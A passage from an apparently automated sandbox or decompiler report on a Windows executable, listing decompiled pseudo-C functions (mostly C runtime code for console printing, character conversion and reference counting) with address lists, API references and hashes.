                                                											__eax = 1 +  *(__ebp - 8);
                                                											__eflags = __eax;
                                                											 *(__ebp - 8) = __eax;
                                                										}
                                                										L31:
                                                										__ecx =  *(__ebp - 0xc);
                                                										 *(__ebp - 0x14) = __ecx;
                                                										goto L39;
                                                									case 2:
                                                										L32:
                                                										 *(__ebp - 8) = 0;
                                                										while(1) {
                                                											L34:
                                                											__eax =  *(__ebp - 8);
                                                											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                												break;
                                                											}
                                                											L35:
                                                											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                											__ecx = 0x11;
                                                											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                											__edi = __esi + __ecx;
                                                											__edi = __esi + __ecx + __ecx;
                                                											__ecx = 0;
                                                											asm("movsb");
                                                											__ecx =  *(__ebp - 0xc);
                                                											__ecx = 1 +  *(__ebp - 0xc);
                                                											 *(__ebp - 0xc) = __ecx;
                                                											__edx =  *(__ebp - 8);
                                                											__edx = 1 +  *(__ebp - 8);
                                                											__eflags = __edx;
                                                											 *(__ebp - 8) = __edx;
                                                										}
                                                										L36:
                                                										__edx =  *(__ebp - 0xc);
                                                										 *(__ebp - 0x14) =  *(__ebp - 0xc);
                                                										L39:
                                                										__eflags =  *(_t433 - 0x14);
                                                										if(__eflags == 0) {
                                                											E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                											E012312B0(0x1b, 0xc);
                                                											_push(0x124f918);
                                                											E0123715C(_t314, _t397, _t421, __eflags);
                                                											_t435 = _t435 + 4;
                                                											_t249 = E01232E80(_t314, _t365, __eflags, _t457);
                                                										}
                                                										__eflags =  *(_t433 - 0x28);
                                                										if( *(_t433 - 0x28) != 0) {
                                                											L85:
                                                											 *(_t433 - 0x28) = 0;
                                                										} else {
                                                											L42:
                                                											 *(_t433 - 8) = 0;
                                                											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
                                                											while(1) {
                                                												L44:
                                                												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                													break;
                                                												}
                                                												L45:
                                                												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												_t322 = 1 +  *(_t433 - 8);
                                                												 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                												_t391 =  *(_t433 - 0xc) - 1;
                                                												__eflags = _t391;
                                                												 *(_t433 - 0xc) = _t391;
                                                											}
                                                											L46:
                                                											 *(_t433 - 8) = 0;
                                                											while(1) {
                                                												L48:
                                                												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                												if(__eflags >= 0) {
                                                													goto L50;
                                                												}
                                                												L49:
                                                												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												L47:
                                                												_t322 = 1 +  *(_t433 - 8);
                                                												__eflags = _t322;
                                                												 *(_t433 - 8) = _t322;
                                                											}
                                                											goto L50;
                                                										}
                                                										goto L86;
                                                									case 3:
                                                										L37:
                                                										goto L87;
                                                								}
                                                							}
                                                							break;
                                                						}
                                                						L87:
                                                						return _t249;
                                                						L88:
                                                					}
                                                				}
                                                			}

































                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x01233481
                                                0x0123348a
                                                0x0123348d
                                                0x0123348d
                                                0x01233490
                                                0x01233493
                                                0x01233493
                                                0x01233499
                                                0x012334a2
                                                0x012334ad
                                                0x012334ae
                                                0x012334b3
                                                0x012334cc
                                                0x012334e2
                                                0x012334f0
                                                0x012334f5
                                                0x012334fa
                                                0x012334fd
                                                0x01233500
                                                0x01233505
                                                0x01233505
                                                0x0123350b
                                                0x0123350f
                                                0x01233510
                                                0x01233510
                                                0x01233515
                                                0x0123351e
                                                0x0123352c
                                                0x01233530
                                                0x0123353a
                                                0x0123353e
                                                0x01233548
                                                0x0123354c
                                                0x01233556
                                                0x0123355a
                                                0x0123355b
                                                0x01233560
                                                0x01233565
                                                0x0123356e
                                                0x01233571
                                                0x0123357e
                                                0x00000000
                                                0x01233573
                                                0x01233573
                                                0x01233579
                                                0x01233579
                                                0x01233583
                                                0x01233583
                                                0x01233587
                                                0x0123358a
                                                0x01233595
                                                0x01233595
                                                0x0123358c
                                                0x0123358c
                                                0x01233590
                                                0x01233593
                                                0x00000000
                                                0x00000000
                                                0x01233593
                                                0x0123359c
                                                0x012335a0
                                                0x012335a3
                                                0x012335a5
                                                0x012335a8
                                                0x012335ab
                                                0x012335ad
                                                0x012335ad
                                                0x012335ab
                                                0x012335b4
                                                0x012335b8
                                                0x012335bb
                                                0x01233361
                                                0x01233361
                                                0x01233366
                                                0x0123336a
                                                0x01233388
                                                0x0123338d
                                                0x01233392
                                                0x01233397
                                                0x0123336c
                                                0x01233370
                                                0x01233375
                                                0x0123337a
                                                0x0123337f
                                                0x0123337f
                                                0x0123339a
                                                0x0123339e
                                                0x012333a3
                                                0x012333a8
                                                0x012333ad
                                                0x012333b4
                                                0x012333b9
                                                0x012333cb
                                                0x012333cb
                                                0x012333cb
                                                0x012333cf
                                                0x00000000
                                                0x00000000
                                                0x012333d1
                                                0x012333d1
                                                0x012333d6
                                                0x012333db
                                                0x012333e0
                                                0x012333c2
                                                0x012333c5
                                                0x012333c5
                                                0x012333c8
                                                0x012333c8
                                                0x012333e5
                                                0x012333e5
                                                0x012333e9
                                                0x012333eb
                                                0x012333f1
                                                0x012333ff
                                                0x012333ff
                                                0x012333ff
                                                0x01233403
                                                0x00000000
                                                0x00000000
                                                0x01233405
                                                0x0123340b
                                                0x01233422
                                                0x01233422
                                                0x01233422
                                                0x01233424
                                                0x012333f6
                                                0x012333f9
                                                0x012333f9
                                                0x012333fc
                                                0x012333fc
                                                0x01233427
                                                0x01233427
                                                0x01233439
                                                0x01233439
                                                0x0123343c
                                                0x0123343f
                                                0x00000000
                                                0x00000000
                                                0x01233441
                                                0x01233447
                                                0x01233458
                                                0x01233458
                                                0x01233458
                                                0x0123345a
                                                0x01233430
                                                0x01233433
                                                0x01233433
                                                0x01233436
                                                0x01233436
                                                0x01233439
                                                0x0123345d
                                                0x01233460
                                                0x01233463
                                                0x01233465
                                                0x01233465
                                                0x0123346c
                                                0x0123346f
                                                0x01233472
                                                0x0123348d
                                                0x01233490
                                                0x01233493
                                                0x01233493
                                                0x00000000
                                                0x01233493
                                                0x012335c1
                                                0x012335c1
                                                0x012335c5
                                                0x012335c8
                                                0x00000000
                                                0x00000000
                                                0x012335ce
                                                0x012335ce
                                                0x012335d2
                                                0x012335d5
                                                0x00000000
                                                0x00000000
                                                0x012335db
                                                0x012335e4
                                                0x012335e4
                                                0x012335e9
                                                0x012335eb
                                                0x00000000
                                                0x00000000
                                                0x01232ee9
                                                0x01232ee9
                                                0x01232ef0
                                                0x01232ef7
                                                0x01232efe
                                                0x01232f0f
                                                0x01232f14
                                                0x01232f17
                                                0x01232f1c
                                                0x01232f1c
                                                0x01232f29
                                                0x01232f37
                                                0x01232f45
                                                0x01232f55
                                                0x01232f5c
                                                0x01232f61
                                                0x01232f67
                                                0x00000000
                                                0x00000000
                                                0x01232f69
                                                0x01232f73
                                                0x01232f78
                                                0x01232f7b
                                                0x01232f80
                                                0x01232f80
                                                0x01232f83
                                                0x01232f87
                                                0x01232f91
                                                0x01232f98
                                                0x01232f9d
                                                0x01232fa3
                                                0x00000000
                                                0x00000000
                                                0x01232fa5
                                                0x01232fb3
                                                0x01232fb8
                                                0x01232fbd
                                                0x01232fc5
                                                0x01232fc5
                                                0x01232fc8
                                                0x01232fca
                                                0x01232fca
                                                0x01232fcf
                                                0x01232fd0
                                                0x01232fd5
                                                0x01232fd5
                                                0x01232fdd
                                                0x01232fe0
                                                0x01232fe3
                                                0x01232fe9
                                                0x01232fea
                                                0x01232ff2
                                                0x01232ffb
                                                0x01233000
                                                0x01233005
                                                0x01233011
                                                0x01233016
                                                0x0123301b
                                                0x01233027
                                                0x0123302c
                                                0x01233031
                                                0x0123303d
                                                0x01233042
                                                0x01233047
                                                0x0123304c
                                                0x01233053
                                                0x01233058
                                                0x0123306a
                                                0x0123306a
                                                0x0123306a
                                                0x0123306e
                                                0x00000000
                                                0x00000000
                                                0x01233070
                                                0x01233070
                                                0x01233075
                                                0x0123307a
                                                0x01233064
                                                0x01233064
                                                0x01233067
                                                0x01233067
                                                0x0123307f
                                                0x01233083
                                                0x01233088
                                                0x0123308d
                                                0x01233092
                                                0x01233095
                                                0x0123309c
                                                0x0123309f
                                                0x012330a2
                                                0x012330ab
                                                0x012330b4
                                                0x012330b7
                                                0x012330bb
                                                0x0123327b
                                                0x0123327b
                                                0x01233284
                                                0x01233289
                                                0x0123328e
                                                0x0123329a
                                                0x0123329f
                                                0x012332a4
                                                0x012332a9
                                                0x012332ac
                                                0x00000000
                                                0x012330c1
                                                0x012330c1
                                                0x012330c4
                                                0x00000000
                                                0x012330cb
                                                0x012330cf
                                                0x012330d4
                                                0x012330d9
                                                0x012330e1
                                                0x012330ea
                                                0x012330ef
                                                0x012330f2
                                                0x01233104
                                                0x01233104
                                                0x01233107
                                                0x0123310a
                                                0x00000000
                                                0x00000000
                                                0x0123310c
                                                0x01233119
                                                0x0123311e
                                                0x01233123
                                                0x01233126
                                                0x01233128
                                                0x01233130
                                                0x01233141
                                                0x01233141
                                                0x01233141
                                                0x01233143
                                                0x01233147
                                                0x01233147
                                                0x0123314a
                                                0x0123314a
                                                0x012330fe
                                                0x012330fe
                                                0x01233101
                                                0x01233101
                                                0x0123314f
                                                0x0123314f
                                                0x01233152
                                                0x00000000
                                                0x00000000
                                                0x0123315a
                                                0x0123315a
                                                0x0123315e
                                                0x01233163
                                                0x01233168
                                                0x0123316d
                                                0x01233170
                                                0x01233181
                                                0x0123318a
                                                0x0123318c
                                                0x01233196
                                                0x0123319b
                                                0x012331a0
                                                0x012331a5
                                                0x012331a5
                                                0x012331a8
                                                0x012331b1
                                                0x012331b1
                                                0x012331b5
                                                0x012331b8
                                                0x012331b9
                                                0x012331be
                                                0x012331c5
                                                0x012331d7
                                                0x012331d7
                                                0x012331d7
                                                0x012331da
                                                0x012331dd
                                                0x00000000
                                                0x00000000
                                                0x012331df
                                                0x012331df
                                                0x012331e6
                                                0x012331e9
                                                0x012331ec
                                                0x012331f1
                                                0x012331f9
                                                0x012331fb
                                                0x01233200
                                                0x01233203
                                                0x01233209
                                                0x0123320c
                                                0x0123320f
                                                0x01233214
                                                0x01233214
                                                0x01233214
                                                0x01233214
                                                0x01233216
                                                0x01233217
                                                0x0123321a
                                                0x0123321a
                                                0x0123321d
                                                0x0123321d
                                                0x012331ce
                                                0x012331d1
                                                0x012331d1
                                                0x012331d4
                                                0x012331d4
                                                0x01233222
                                                0x01233222
                                                0x01233225
                                                0x00000000
                                                0x00000000
                                                0x0123322d
                                                0x0123322d
                                                0x0123323f
                                                0x0123323f
                                                0x0123323f
                                                0x01233242
                                                0x01233245
                                                0x00000000
                                                0x00000000
                                                0x01233247
                                                0x0123324a
                                                0x0123324d
                                                0x01233253
                                                0x01233256
                                                0x01233259
                                                0x0123325e
                                                0x0123325e
                                                0x0123325e
                                                0x0123325e
                                                0x01233260
                                                0x01233261
                                                0x01233264
                                                0x01233267
                                                0x01233236
                                                0x01233239
                                                0x01233239
                                                0x0123323c
                                                0x0123323c
                                                0x0123326c
                                                0x0123326c
                                                0x0123326f
                                                0x012332b3
                                                0x012332b3
                                                0x012332b7
                                                0x012332b9
                                                0x012332c2
                                                0x012332c7
                                                0x012332cc
                                                0x012332d1
                                                0x012332d4
                                                0x012332d4
                                                0x012332d9
                                                0x012332dd
                                                0x012335dd
                                                0x012335dd
                                                0x012332e3
                                                0x012332e3
                                                0x012332e3
                                                0x012332f0
                                                0x01233307
                                                0x01233307
                                                0x0123330a
                                                0x0123330d
                                                0x00000000
                                                0x00000000
                                                0x0123330f
                                                0x01233315
                                                0x01233326
                                                0x01233326
                                                0x01233326
                                                0x01233328
                                                0x012332f8
                                                0x012332fb
                                                0x01233301
                                                0x01233301
                                                0x01233304
                                                0x01233304
                                                0x0123332b
                                                0x0123332b
                                                0x0123333d
                                                0x0123333d
                                                0x01233340
                                                0x01233343
                                                0x00000000
                                                0x00000000
                                                0x01233345
                                                0x0123334b
                                                0x0123335c
                                                0x0123335c
                                                0x0123335c
                                                0x0123335e
                                                0x01233334
                                                0x01233337
                                                0x01233337
                                                0x0123333a
                                                0x0123333a
                                                0x00000000
                                                0x0123333d
                                                0x00000000
                                                0x00000000
                                                0x01233274
                                                0x00000000
                                                0x00000000
                                                0x012330c4
                                                0x00000000
                                                0x012330bb
                                                0x012335f1
                                                0x012335f6
                                                0x00000000
                                                0x012335f6
                                                0x0123348d

                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012334B3
                                                • _wprintf.LIBCMT ref: 01233560
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition
                                                • String ID: %d.$%s%s%s%s
                                                • API String ID: 3459578117-4028964860
                                                • Opcode ID: 35bfc59a491c3d1461725748e18d34aace066e60186c68588ac93b7c2777ad19
                                                • Instruction ID: 0ce7d7aad8782f8f870fb39d6a6a73441fda7a7f3df5374d2e50e912b325e93b
                                                • Opcode Fuzzy Hash: 35bfc59a491c3d1461725748e18d34aace066e60186c68588ac93b7c2777ad19
                                                • Instruction Fuzzy Hash: E3415EB1E1404BAFCF18CB88D5D1ABEBBB6FBD5304F558199D101AB285DA309A45CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E01241673(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				signed int _v20;
                                                				void* __edi;
                                                				signed int _t35;
                                                				int _t38;
                                                				intOrPtr* _t44;
                                                				int _t47;
                                                				short* _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t54;
                                                				int _t55;
                                                				void* _t57;
                                                				signed int _t59;
                                                				char* _t62;
                                                
                                                				_t62 = _a8;
                                                				if(_t62 == 0) {
                                                					L5:
                                                					return 0;
                                                				}
                                                				_t50 = _a12;
                                                				if(_t50 == 0) {
                                                					goto L5;
                                                				}
                                                				if( *_t62 != 0) {
                                                					_push(_t57);
                                                					E01237857( &_v20, _t57, _a16);
                                                					_t35 = _v20;
                                                					__eflags =  *(_t35 + 0xa8);
                                                					if( *(_t35 + 0xa8) != 0) {
                                                						_t38 = E0124124B( *_t62 & 0x000000ff,  &_v20);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							__eflags = _a4;
                                                							_t59 = 1;
                                                							_t28 = _v20 + 4; // 0x20432f41
                                                							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                							if(__eflags != 0) {
                                                								L21:
                                                								__eflags = _v8;
                                                								if(_v8 != 0) {
                                                									_t54 = _v12;
                                                									_t31 = _t54 + 0x70;
                                                									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                									__eflags =  *_t31;
                                                								}
                                                								return _t59;
                                                							}
                                                							L20:
                                                							_t44 = E01238EFF(__eflags);
                                                							_t59 = _t59 | 0xffffffff;
                                                							__eflags = _t59;
                                                							 *_t44 = 0x2a;
                                                							goto L21;
                                                						}
                                                						_t59 = _v20;
                                                						__eflags =  *(_t59 + 0x74) - 1;
                                                						if( *(_t59 + 0x74) <= 1) {
                                                							L15:
                                                							_t20 = _t59 + 0x74; // 0x3a202020
                                                							__eflags = _t50 -  *_t20;
                                                							L16:
                                                							if(__eflags < 0) {
                                                								goto L20;
                                                							}
                                                							__eflags = _t62[1];
                                                							if(__eflags == 0) {
                                                								goto L20;
                                                							}
                                                							L18:
                                                							_t22 = _t59 + 0x74; // 0x3a202020
                                                							_t59 =  *_t22;
                                                							goto L21;
                                                						}
                                                						_t12 = _t59 + 0x74; // 0x3a202020
                                                						__eflags = _t50 -  *_t12;
                                                						if(__eflags < 0) {
                                                							goto L16;
                                                						}
                                                						__eflags = _a4;
                                                						_t17 = _t59 + 0x74; // 0x3a202020
                                                						_t18 = _t59 + 4; // 0x20432f41
                                                						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                						_t59 = _v20;
                                                						__eflags = _t47;
                                                						if(_t47 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L15;
                                                					}
                                                					_t55 = _a4;
                                                					__eflags = _t55;
                                                					if(_t55 != 0) {
                                                						 *_t55 =  *_t62 & 0x000000ff;
                                                					}
                                                					_t59 = 1;
                                                					goto L21;
                                                				}
                                                				_t49 = _a4;
                                                				if(_t49 != 0) {
                                                					 *_t49 = 0;
                                                				}
                                                				goto L5;
                                                			}


















                                                0x0124167b
                                                0x01241680
                                                0x0124169a
                                                0x00000000
                                                0x0124169a
                                                0x01241682
                                                0x01241687
                                                0x00000000
                                                0x00000000
                                                0x0124168c
                                                0x012416a0
                                                0x012416a7
                                                0x012416ac
                                                0x012416af
                                                0x012416b6
                                                0x012416d5
                                                0x012416dc
                                                0x012416de
                                                0x01241722
                                                0x0124172a
                                                0x01241736
                                                0x0124173f
                                                0x01241741
                                                0x01241751
                                                0x01241751
                                                0x01241755
                                                0x01241757
                                                0x0124175a
                                                0x0124175a
                                                0x0124175a
                                                0x0124175a
                                                0x00000000
                                                0x01241760
                                                0x01241743
                                                0x01241743
                                                0x01241748
                                                0x01241748
                                                0x0124174b
                                                0x00000000
                                                0x0124174b
                                                0x012416e0
                                                0x012416e3
                                                0x012416e7
                                                0x01241710
                                                0x01241710
                                                0x01241710
                                                0x01241713
                                                0x01241713
                                                0x00000000
                                                0x00000000
                                                0x01241715
                                                0x01241719
                                                0x00000000
                                                0x00000000
                                                0x0124171b
                                                0x0124171b
                                                0x0124171b
                                                0x00000000
                                                0x0124171b
                                                0x012416e9
                                                0x012416e9
                                                0x012416ec
                                                0x00000000
                                                0x00000000
                                                0x012416f0
                                                0x012416fa
                                                0x01241700
                                                0x01241703
                                                0x01241709
                                                0x0124170c
                                                0x0124170e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0124170e
                                                0x012416b8
                                                0x012416bb
                                                0x012416bd
                                                0x012416c2
                                                0x012416c2
                                                0x012416c7
                                                0x00000000
                                                0x012416c7
                                                0x0124168e
                                                0x01241693
                                                0x01241697
                                                0x01241697
                                                0x00000000

                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 012416A7
                                                • __isleadbyte_l.LIBCMT ref: 012416D5
                                                • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,0124FF04,?,00000000), ref: 01241703
                                                • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,0124FF04,?,00000000), ref: 01241739
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 4ea13e41c4326518021bdc160fdea954d8357356850a0f07fd6c8b73935f2dd7
                                                • Instruction ID: ce199ebaf941c399e275516d9836581e1e6676c0bfd5b2e6bcbeabcea774ca07
                                                • Opcode Fuzzy Hash: 4ea13e41c4326518021bdc160fdea954d8357356850a0f07fd6c8b73935f2dd7
                                                • Instruction Fuzzy Hash: 8D31A431620217AFDB2EDE78C845B7A7FB5FF41250F194418E66487190D770F4A1DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0123ECB1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                				intOrPtr _t25;
                                                				void* _t26;
                                                
                                                				_t25 = _a16;
                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                					_t26 = E0123F1FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                					goto L9;
                                                				} else {
                                                					_t35 = _t25 - 0x66;
                                                					if(_t25 != 0x66) {
                                                						__eflags = _t25 - 0x61;
                                                						if(_t25 == 0x61) {
                                                							L7:
                                                							_t26 = E0123ED37(_a4, _a8, _a12, _a20, _a24, _a28);
                                                						} else {
                                                							__eflags = _t25 - 0x41;
                                                							if(__eflags == 0) {
                                                								goto L7;
                                                							} else {
                                                								_t26 = E0123F473(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                							}
                                                						}
                                                						L9:
                                                						return _t26;
                                                					} else {
                                                						return E0123F3B4(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                                					}
                                                				}
                                                			}





                                                0x0123ecb4
                                                0x0123ecba
                                                0x0123ed2d
                                                0x00000000
                                                0x0123ecc1
                                                0x0123ecc1
                                                0x0123ecc4
                                                0x0123ecdf
                                                0x0123ece2
                                                0x0123ed02
                                                0x0123ed14
                                                0x0123ece4
                                                0x0123ece4
                                                0x0123ece7
                                                0x00000000
                                                0x0123ece9
                                                0x0123ecfb
                                                0x0123ecfb
                                                0x0123ece7
                                                0x0123ed32
                                                0x0123ed36
                                                0x0123ecc6
                                                0x0123ecde
                                                0x0123ecde
                                                0x0123ecc4

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction ID: bc1ba196169972caf36ed79b812752295c6241e0107106cc27b9a04a67d3bfea
                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction Fuzzy Hash: E8014CB246014EFBCF125F88DC45CEE3F26BB99254B5A8815FF1858130D336C9B5AB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0123CC10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				LONG* _t20;
                                                				signed int _t25;
                                                				void* _t31;
                                                				LONG* _t33;
                                                				void* _t34;
                                                				void* _t35;
                                                
                                                				_t35 = __eflags;
                                                				_t29 = __edx;
                                                				_t24 = __ebx;
                                                				_push(0xc);
                                                				_push(0x124d9a0);
                                                				E01239160(__ebx, __edi, __esi);
                                                				_t31 = E0123D59F(__edx, __edi, _t35);
                                                				_t25 =  *0x1251c6c; // 0xfffffffe
                                                				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                					E0123BE5F(0xd);
                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                					_t33 =  *(_t31 + 0x68);
                                                					 *(_t34 - 0x1c) = _t33;
                                                					__eflags = _t33 -  *0x1251524; // 0x1251820
                                                					if(__eflags != 0) {
                                                						__eflags = _t33;
                                                						if(__eflags != 0) {
                                                							__eflags = InterlockedDecrement(_t33);
                                                							if(__eflags == 0) {
                                                								__eflags = _t33 - 0x1251820;
                                                								if(__eflags != 0) {
                                                									E01238F53(_t33);
                                                								}
                                                							}
                                                						}
                                                						_t20 =  *0x1251524; // 0x1251820
                                                						 *(_t31 + 0x68) = _t20;
                                                						_t33 =  *0x1251524; // 0x1251820
                                                						 *(_t34 - 0x1c) = _t33;
                                                						InterlockedIncrement(_t33);
                                                					}
                                                					 *(_t34 - 4) = 0xfffffffe;
                                                					E0123CCAC();
                                                				} else {
                                                					_t33 =  *(_t31 + 0x68);
                                                				}
                                                				_t38 = _t33;
                                                				if(_t33 == 0) {
                                                					E0123751F(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                				}
                                                				return E012391A5(_t33);
                                                			}









                                                0x0123cc10
                                                0x0123cc10
                                                0x0123cc10
                                                0x0123cc10
                                                0x0123cc12
                                                0x0123cc17
                                                0x0123cc21
                                                0x0123cc23
                                                0x0123cc2c
                                                0x0123cc4d
                                                0x0123cc53
                                                0x0123cc57
                                                0x0123cc5a
                                                0x0123cc5d
                                                0x0123cc63
                                                0x0123cc65
                                                0x0123cc67
                                                0x0123cc70
                                                0x0123cc72
                                                0x0123cc74
                                                0x0123cc7a
                                                0x0123cc7d
                                                0x0123cc82
                                                0x0123cc7a
                                                0x0123cc72
                                                0x0123cc83
                                                0x0123cc88
                                                0x0123cc8b
                                                0x0123cc91
                                                0x0123cc95
                                                0x0123cc95
                                                0x0123cc9b
                                                0x0123cca2
                                                0x0123cc34
                                                0x0123cc34
                                                0x0123cc34
                                                0x0123cc37
                                                0x0123cc39
                                                0x0123cc3d
                                                0x0123cc42
                                                0x0123cc4a

                                                APIs
                                                  • Part of subcall function 0123D59F: __getptd_noexit.LIBCMT ref: 0123D5A0
                                                • __lock.LIBCMT ref: 0123CC4D
                                                • InterlockedDecrement.KERNEL32(?), ref: 0123CC6A
                                                • _free.LIBCMT ref: 0123CC7D
                                                • InterlockedIncrement.KERNEL32(01251820), ref: 0123CC95
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 2704283638-0
                                                • Opcode ID: 0883352c0a925fba824aecee48a8a3fa1e3832efe549e7a585efaf45a44da2d9
                                                • Instruction ID: 099c9ac3995efe6e602a3e31623a3be9aead9fa77135d7cb14737d78d3cbcf89
                                                • Opcode Fuzzy Hash: 0883352c0a925fba824aecee48a8a3fa1e3832efe549e7a585efaf45a44da2d9
                                                • Instruction Fuzzy Hash: 4D01D6B6A20B139BDB3AAF6DB0483AD77A0BFC4710F04440ADA1477280CB349961CFD5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E01231B30(intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				char _v45;
                                                				short _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v64;
                                                				intOrPtr _v68;
                                                				char _v71;
                                                				char _v75;
                                                				char _v79;
                                                				char _v80;
                                                				char _v92;
                                                				char _v167;
                                                				char _v168;
                                                				signed int _t163;
                                                				signed int _t177;
                                                				signed int _t178;
                                                				void* _t186;
                                                				intOrPtr _t189;
                                                				void* _t292;
                                                				void* _t293;
                                                				void* _t294;
                                                
                                                				_v64 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
